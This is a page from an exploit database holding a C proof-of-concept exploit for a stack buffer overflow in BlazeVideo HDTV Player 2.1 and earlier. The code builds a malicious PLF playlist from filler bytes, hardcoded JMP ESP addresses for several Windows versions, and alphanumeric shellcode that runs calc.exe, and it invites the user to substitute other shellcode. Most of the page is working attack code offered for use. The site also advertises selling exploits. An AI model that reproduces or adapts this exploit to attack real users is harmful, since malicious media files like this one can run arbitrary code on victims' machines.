0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
BlazeVideo HDTV Player <= 2.1 Malformed PLF Buffer Overflow PoC
[===============================================================
BlazeVideo HDTV Player <= 2.1 Malformed PLF Buffer Overflow PoC
===============================================================
/*
========================================================================
0-day BlazeVideo HDTV Player <= v2.1 Malformed PLF Buffer Overflow PoC
========================================================================
BlazeVideo HDTV v2.1 and prior fails to properly handle large file paths inside
PLF files, the result is a stack based buffer overflow that allows an
attacker to execute code in the context of the player.
This exploit should also work for BlazeDVD v5.0, but i havent gotten
around to testing it.
C:\ + [BUFFER x 257 bytes] + [JMP] + [16 Garbage bytes] + [SHELLCODE in ESP]
Happy Hunting and Happy Holidays to everyone
<insert super awesome leet ascii art here>
30 days of Media Player Exploits by Greg Linares
Discovered and Reported By: Greg Linares GLinares.code@gmail.com
Reported Exploit Date: 12/1/2006
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
FILE *Exploit;
/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders <expanders[at]gmail[dot]com> */
unsigned char scode[] =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
"LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
"sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";
/* replace it with your own shellcode :) */
int JMP, x;
printf("\n======================================================================\n");
printf("BlazeVideo HDTV Player <= v2.3 M3U Buffer Overflow Exploit\n");
printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com>\n");
printf("Usage: %s <output PLF file> <JMP>\n", argv[0]);
printf("\n JMP Options\n");
printf("1 = English Windows XP SP 2 User32.dll <JMP ESP 0x77db41bc>\n");
printf("2 = English Windows XP SP 1 User32.dll <JMP ESP 0x77d718fc>\n");
printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP 0x77d74adc>\n");
printf("4 = English Windows 2000 SP 4 User32.dll <JMP ESP 0x77e3c256>\n");
printf("5 = French Windows XP Pro SP2 <JMP ESP 0x77d8519f> \n");
printf("6 = German/Italian/Dutch/Polish Windows XP SP2 <JMP ESP 0x77d873a0> \n");
printf("7 = Spainish Windows XP Pro SP2 <JMP ESP 0x77d9932f> \n");
printf("8 = French/Italian/German/Polish/Dutch Windows 2000 Pro SP4 <JMP ESP 0x77e04c29>\n");
printf("9 = French/Italian/Chineese Windows 2000 Server SP4 <JMP ESP 0x77df4c29>\n");
printf("====================================================================\n\n\n");
/* thanks metasploit and jerome for opcodes */
if (argc < 2) {
printf("Invalid Number Of Arguments\n");
return 1;
}
Exploit = fopen(argv[1],"w");
if ( !Exploit )
{
printf("\nCouldn't Open File!");
return 1;
}
fputs("C:\\", Exploit);
for (x=0;x<257;x++) {
fputs("A", Exploit);
}
if (atoi(argv[2]) <= 0) {
JMP = 1;
} else if (atoi(argv[2]) > 4) {
JMP = 1;
} else {
JMP = atoi(argv[2]);
}
switch(JMP) {
case 1:
printf("Using English Windows XP SP2 JMP...\n");
fputs("\xbc\x41\xdb\x77", Exploit);
break;
case 2:
printf("Using English Windows XP SP1 JMP...\n");
fputs("\xfc\x18\xd7\x77", Exploit);
break;
case 3:
printf("Using English Windows 2003 SP0 & SP1 JMP...\n");
fputs("\xdc\x4a\xd7\x77", Exploit);
break;
case 4:
printf("Using English Windows 2000 SP 4 JMP...\n");
fputs("\x56\xc2\xe3\x77", Exploit);
break;
case 5:
printf("Using French Windows XP SP 2 JMP...\n");
fputs("\x9f\x51\xd8\x77", Exploit);
break;
case 6:
printf("Using German/Italian/Dutch/Polish Windows XP SP 2 JMP...\n");
fputs("\xa0\x73\xd8\x77", Exploit);
break;
case 7:
printf("Using Spainish Windows XP SP 2 JMP...\n");
fputs("\x2f\x93\xd9\x77", Exploit);
break;
case 8:
printf("Using French/Italian/German/Polish/Dutch Windows 2000 Pro SP 4 JMP...\n");
fputs("\x29\x4c\xe0\x77", Exploit);
break;
case 9:
printf("Using French/Italian/Chineese Windows 2000 Server SP 4 JMP...\n");
fputs("\x29\x4c\xdf\x77", Exploit);
break;
}
for (x=0;x<16;x++) {
fputs("\x58", Exploit);
}
fputs(scode, Exploit);
fputs("\r\n", Exploit);
printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);
printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n");
printf("Greetz to: Everyone at EEye, Metasploit Crew, Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n");
fclose(Exploit);
return 0;
}
# 0day.today [2024-11-15] #